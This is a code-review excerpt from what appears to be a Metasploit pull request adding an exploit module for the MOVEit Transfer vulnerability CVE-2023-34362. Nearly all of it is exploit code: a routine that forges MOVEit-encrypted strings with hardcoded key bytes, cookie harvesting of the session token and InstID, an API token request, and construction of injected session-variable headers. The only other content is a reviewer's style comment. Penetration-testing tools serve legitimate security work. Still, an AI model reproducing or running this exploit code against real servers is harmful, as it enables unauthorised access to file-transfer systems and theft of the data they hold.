modules/exploits/windows/http/moveit_cve_2023_34362.rb

```diff
@@ -0,0 +1,491 @@
+      iv *= 4
+    end
+
+    # MOVEit.DMZ.Core.Cryptography.Encryption
+    key = [64, 131, 232, 51, 134, 103, 230, 30, 48, 86, 253, 157].pack('C*')
+    key += org_key
+    key += [0, 0, 0, 0].pack('C*')
+
+    # MOVEit.Crypto.AesMOVEitCryptoTransform
+    cipher = OpenSSL::Cipher.new('AES-256-CBC')
+
+    cipher.encrypt
+    cipher.key = key
+    cipher.iv = iv
+    encrypted_data = cipher.update(data) + cipher.final
+    data_sha1_hash = Digest::SHA1.digest(data).unpack('C*')
+    org_key_sha1_hash = Digest::SHA1.digest(org_key).unpack('C*')
+
+    # MOVEit.DMZ.Core.Cryptography.Providers.MOVEit.MOVEitV2EncryptedStringHeader
+    header = [
+      225, # MOVEitV2EncryptedStringHeader
+      0,
+      data_sha1_hash[0],
+      data_sha1_hash[1],
+      org_key_sha1_hash[0],
+      org_key_sha1_hash[1],
+      org_key_sha1_hash[2],
+      org_key_sha1_hash[3],
+      iv.unpack('C*')[0],
+      iv.unpack('C*')[1],
+      iv.unpack('C*')[2],
+      iv.unpack('C*')[3],
+    ].pack('C*')
+
+    # MOVEit.DMZ.Core.Cryptography.Encryption
+    return tag + Base64.strict_encode64(header + encrypted_data)
+  end
+
+  def populate_token_instid
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'connection' => 'keep-alive',
+        'accept' => '*/*'
+      })
+
+      @cookies = res.get_cookies
+      # Get the session id from the cookies
+      if @cookies =~ /ASP.NET_SessionId=([a-z0-9]+);/
+        @moveit_token = ::Regexp.last_match(1)
+        vprint_status("@moveit_token = #{@moveit_token}")
+      else
+        fail_with(Msf::Exploit::Failure::Unknown, 'Could not find token from cookies!')
+      end
+
+      # Get the InstID from the cookies
+      if @cookies =~ /siLockLongTermInstID=([0-9]+);/
+        @moveit_instid = ::Regexp.last_match(1)
+        vprint_status("@moveit_instid = #{@moveit_instid}")
+      else
+        fail_with(Msf::Exploit::Failure::Unknown, 'Could not find InstID from cookies!')
+      end
+    end
+    return true
+  end
+
+  def request_api_token
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri('/api/v1/token'),
+      'Content-Type' => 'application/x-www-form-urlencoded',
+      'connection' => 'keep-alive',
+      'accept' => '*/*',
+      'vars_post' => {
+        'grant_type' => 'password',
+        'username' => datastore['LOGIN_NAME'],
+        'password' => datastore['PASSWORD']
+      }
+    })
+
+    if res.code != 200
+      fail_with(Msf::Exploit::Failure::Unknown, "Couldn't get API token (#{res.body})")
+    end
+    token_json = JSON.parse(res.body)
+    vprint_status("Got API access token='#{token_json['access_token']}'.")
+    token_json
+  end
+
+  def set_session(token, session_hash)
+    session_vars = {}
+    session_index = 0
+    session_hash.each_pair do |k, v|
+      session_vars.store("X-siLock-SessVar#{session_index}", "#{k}: #{v}")
```

Comment:
Not sure if the use of `store` is intentional or a pythonism sneaking in 👀 

```suggestion
      session_vars["X-siLock-SessVar#{session_index}"] = "#{k}: #{v}"
```